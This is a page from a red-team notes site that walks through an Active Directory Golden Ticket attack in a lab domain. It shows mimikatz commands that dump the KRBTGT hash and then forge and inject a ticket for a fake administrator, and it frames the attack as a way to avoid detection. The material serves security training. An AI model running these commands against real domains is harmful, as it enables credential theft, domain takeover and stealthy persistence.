πŸ““
πŸ““
πŸ““
πŸ““
Red Team Notes
Search…
πŸ““
πŸ““
πŸ““
πŸ““
Red Team Notes
Introduction
Red Team Notes 2.0
Red Team
Initial Access
Execution
Persistence
Privesc
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Command and Control
Exfiltration
Impact
Active Directory
Introduction
Enumeration
Attacks
Unconstrained Delegation
Constrained Delegation
DCSync
Kerberoasting
Silver Tickets
Golden Tickets
Detection
Detection
Initial Access
Execution
Resources & References
References & Resources
Powered By GitBook
Golden Tickets
As explained the most powerful account on the DC the KRBTGT Account this account is used to create TGT to any service in the Domain Controller, all that is needed (Easy to say) is to compromise the Domain Controller or use any other attack (DCSync) to grab the password hash of this account we can then use mimikatz to create and inject the Ticket to any service that is desired and this attack, is incredible for avoiding logs since these are legitimate TGTs.
Let's see this attack in action, after all the enumeration and all the hacking with all your setup you managed to get a shell on the DC (Domain Controller) and you grab a user, and this user has Administrator Access.
Here we continue with mimikatz and request the hashes for the KRBTGT user. We can see that there are old hashes and the most current one available for the user.
1
privilege::debug
2
​
3
lsadump::lsa /inject /name:krbtgt
Copied!
On the Kali terminal you will need to make this a one-liner so that the mimkatz binary exits properly.
1
mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit
Copied!
Continuing with the attack now we will request a Golden ticket and create a fake user this user will have total access to the DC and other machines, so from here the fake user created will have to permissions to list the fodlers of the domain controller. It makes no sense to do this attack since the DC and a high level user has been compromised but this is a great opportunity to avoid detection as these forged tickets are legitimate tickets created by the KRBTGT account.
1
One-Liner
2
​
3
mimikatz.exe "kerberos::golden /domain:dc1.dominioncyber.local /sid:S-1-5-21-4198639423-1025486511-2226459690 /rc4:a8bbd83cc1ded03f7db3b07d78e95036 /user:Youllnevercatchme /id:500 /ptt"
Copied!
Let's confirm our assumptions.
We can list the DC directories and the user was authenticated to it as well, the Ticket is saved in the session and with mimikatz I used the msic::cmdcommand to prompt open a new cmd window with the session in memory this is also a great way to Privesc or to Maintain Persistence on a machine.
Recommended to have an RDP Session as for the new cm window will not be shown from the Atacker machine
Previous
Silver Tickets
Next - Detection
Detection
Last modified 2yr ago
Copy link